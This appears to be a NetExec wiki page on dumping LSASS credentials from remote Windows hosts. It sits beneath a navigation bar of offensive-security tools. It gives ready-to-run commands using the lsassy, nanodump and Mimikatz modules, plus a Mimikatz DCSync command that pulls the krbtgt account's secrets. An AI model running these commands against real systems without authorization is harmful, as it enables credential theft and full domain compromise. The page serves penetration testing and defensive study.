🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ”§ NetExec Wiki / Dump LSASS

Dump LSASS

{% hint style="warning" %}
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
{% endhint %}

Using Lsassy

Using the module Lsassy from @pixis , you can dump the credentials remotely

nxc smb <target> -u administrator -p <password> -M lsassy

Using nanodump

Using the module nanodump you can dump the credentials remotely

nxc smb <target> -u administrator -p <password> -M nanodump

Using Mimikatz (deprecated)

{% hint style="warning" %}
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
{% endhint %}

Using the Mimikatz module, the powershell script Invoke-Mimikatz.ps1 will be executed on the remote target

nxc smb <target> -u administrator -p <password> -M mimikatz

nxc smb <target> -u <username> -p <password> -M mimikatz -o COMMAND='"lsadump::dcsync /domain:<domain> /user:krbtgt"